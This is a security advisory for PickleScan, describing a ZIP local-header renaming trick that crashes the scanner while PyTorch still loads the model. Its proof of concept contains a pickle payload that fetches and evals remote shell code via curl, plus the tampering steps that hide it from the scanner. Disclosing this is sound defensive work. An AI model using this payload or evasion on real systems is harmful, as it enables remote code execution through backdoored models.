Headline
GHSA-7q5r-7gvp-wc82: Zip Exploit Crashes Picklescan But Not PyTorch
Summary
PickleScan is vulnerable to a ZIP archive manipulation attack that causes it to crash when attempting to extract and scan PyTorch model archives. By modifying the filename in the ZIP header while keeping the original filename in the directory listing, an attacker can make PickleScan raise a BadZipFile error. However, PyTorch’s more forgiving ZIP implementation still allows the model to be loaded, enabling malicious payloads to bypass detection.
Details
Python’s built-in zipfile module performs strict integrity checks when extracting ZIP files. If a filename stored in the ZIP header does not match the filename in the directory listing, zipfile.ZipFile.open() raises a BadZipFile error. PickleScan relies on zipfile to extract and inspect the contents of PyTorch model archives, making it susceptible to this manipulation.
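The mismatch check can be reproduced with the standard library alone. A minimal sketch, using a plain ZIP built with zipfile rather than a real PyTorch archive (the member name data.pkl mirrors the entry PyTorch writes into its checkpoints):

```python
import io
import zipfile

# Build a small archive containing a single member named "data.pkl",
# mirroring the entry name inside a PyTorch checkpoint.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("data.pkl", b"payload")

# The local file header precedes the central directory in the byte stream,
# so replacing the first occurrence of the name tampers only the header copy.
tampered = buf.getvalue().replace(b"data.pkl", b"datap.kl", 1)

# zipfile still lists the member from the central directory, but read()
# compares both names and refuses to extract it.
err = None
with zipfile.ZipFile(io.BytesIO(tampered)) as z:
    print(z.namelist())  # ['data.pkl'] -- the directory entry is untouched
    try:
        z.read("data.pkl")
    except zipfile.BadZipFile as e:
        err = e
print(err)  # e.g. File name in directory 'data.pkl' and header 'datap.kl' differ.
```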
PyTorch, on the other hand, has a more tolerant ZIP handling mechanism that ignores these discrepancies, allowing the model to load even when PickleScan fails. An attacker can exploit this behavior to embed a malicious pickle file inside a model archive, which PyTorch will load, while preventing PickleScan from scanning the archive.
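The tampering leaves the member's data bytes untouched, which is why a directory-driven reader can still succeed: it locates each member via the central directory's recorded offset and never needs the (now wrong) name in the local header. A hedged sketch of that recovery with the standard library; the claim that PyTorch's internal reader behaves this way is an assumption based on the advisory, not a walkthrough of its code:

```python
import io
import struct
import zipfile

# Recreate a tampered archive as in the attack: local header name changed,
# central directory name intact.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("data.pkl", b"payload")  # ZIP_STORED: data bytes kept verbatim
tampered = buf.getvalue().replace(b"data.pkl", b"datap.kl", 1)

# A directory-driven reader seeks to the member's header offset and skips
# the fixed 30-byte local header plus its name and extra fields.
with zipfile.ZipFile(io.BytesIO(tampered)) as z:
    info = z.infolist()[0]
off = info.header_offset  # assumes the archive starts at byte 0
name_len, extra_len = struct.unpack("<HH", tampered[off + 26:off + 30])
start = off + 30 + name_len + extra_len
payload = tampered[start:start + info.compress_size]
print(payload)  # b'payload' -- the malicious pickle would be fully intact
```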
PoC
import os
import torch

class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, ('eval "$(curl -s http://localhost:8080)"',)

model = RemoteCodeExecution()
file = "does_not_scan_but_opens_in_torch.pth"
torch.save(model, file)

# Tamper with the local file header so that picklescan's zipfile-based
# extraction raises BadZipFile
with open(file, "rb") as f:
    data = f.read()

# Replace only the first occurrence of "data.pkl" (the local header copy);
# the central directory entry keeps the original name
modified_data = data.replace(b"data.pkl", b"datap.kl", 1)

# Write back the modified content
with open(file, "wb") as f:
    f.write(modified_data)

# Load the infected model -- PyTorch tolerates the mismatch and runs the payload
torch.load(file)
Impact
Severity: High
Who is impacted? Any organization or individual using PickleScan to detect malicious pickle files in PyTorch models.
What is the impact? Attackers can embed malicious payloads inside PyTorch model archives while preventing PickleScan from scanning them.
Potential Exploits: This technique can be used in supply chain attacks to distribute backdoored models via platforms like Hugging Face.
Recommendations
Use a More Tolerant ZIP Parser: PickleScan should handle minor ZIP header inconsistencies more gracefully instead of failing outright.
Detect Malformed ZIPs: Instead of crashing, PickleScan should log warnings and attempt to extract valid files.
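One way to implement the second recommendation: before scanning, cross-check each central directory entry against the name stored at its local header offset, and report mismatches instead of aborting. A minimal sketch; the helper name find_header_mismatches is illustrative rather than picklescan API, and it assumes the archive starts at byte offset 0 (no prepended data):

```python
import io
import struct
import zipfile

def find_header_mismatches(data: bytes):
    """Return (directory_name, header_name) pairs that disagree."""
    mismatches = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            off = info.header_offset  # assumes archive starts at offset 0
            # Filename length sits at bytes 26-27 of the local file header
            name_len = struct.unpack("<H", data[off + 26:off + 28])[0]
            header_name = data[off + 30:off + 30 + name_len].decode("cp437")
            if header_name != info.orig_filename:
                mismatches.append((info.orig_filename, header_name))
    return mismatches

# Demo: build an archive, then tamper with the local header name only.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("data.pkl", b"payload")
tampered = buf.getvalue().replace(b"data.pkl", b"datap.kl", 1)

print(find_header_mismatches(buf.getvalue()))  # []
print(find_header_mismatches(tampered))        # [('data.pkl', 'datap.kl')]
```

A scanner using such a check could still extract the member via the central directory offset and scan it, logging the mismatch as suspicious rather than failing outright.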
References
- GHSA-7q5r-7gvp-wc82
- https://nvd.nist.gov/vuln/detail/CVE-2025-1944
- mmaitre314/picklescan@e58e45e
- https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944